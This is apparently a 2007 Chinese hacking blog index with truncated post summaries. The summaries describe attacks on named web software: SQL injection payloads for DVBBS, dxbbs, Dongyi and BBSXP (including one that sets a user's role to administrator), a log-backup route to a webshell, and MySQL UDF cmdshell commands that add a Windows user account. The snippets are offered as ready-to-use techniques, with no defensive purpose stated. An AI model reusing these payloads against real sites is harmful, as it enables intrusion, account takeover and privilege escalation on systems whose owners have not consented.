2007年6月25日
摘要:
对SQL版的动网7.1系统。开放了博客功能登陆http://bbs.xxx.com/bokeindex.asp点“博客管理” 登陆后在点 关键字设置在“链接地址”处写上动网sql注入语句例: 123123'where 1=0;update dv_user set userface=(select top 1 username from dv_user where usercla... 阅读全文
摘要:
呵呵经过上次cooldiyer的社会工程学。给我上了一课。这次就不发切图了。方法叙述给大家。http://www.cooldiyer.com/index.aspx (就借用cooldiyer名字做个教程)首先我们暴个路径看看。http://www.cooldiyer.com/~index.aspx成功暴出路径。知道了路径如果是sql的数据库就可以差异备份和log备份。不过今天我们讲的是log备份。... 阅读全文
摘要:
影响版本:< dxbbs 7.3 详细说明:在User_Friend.aspx过滤了=Add&Name=admin加上''典型的过滤不严,导致注入漏洞. 参考:http://www.winshell.cn/read.php?5... 阅读全文
摘要:
前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL
http://site.com/region.asp?country=tt&city=whytt&province=shi' 阅读全文
摘要:
C:\Winnt\udf.dll 2000C:\Windows\udf.dll 2003 现在基本上win的服务器就这两个导出UDF.DLL create function cmdshell returns string soname 'udf.dll'select cmdshell('net user user password /add'); select cmdshell('net ... 阅读全文
摘要:
芊芊做的教程这里记录一下: 注册---->发帖---->编辑(抓包提交)define:cnsapc为注册用户 bug为帖子内容 提升为管理员:&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'-- 获取后台密码"&cnsapc=bug','');update bbsxp_use... 阅读全文
摘要:
ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。************************************... 阅读全文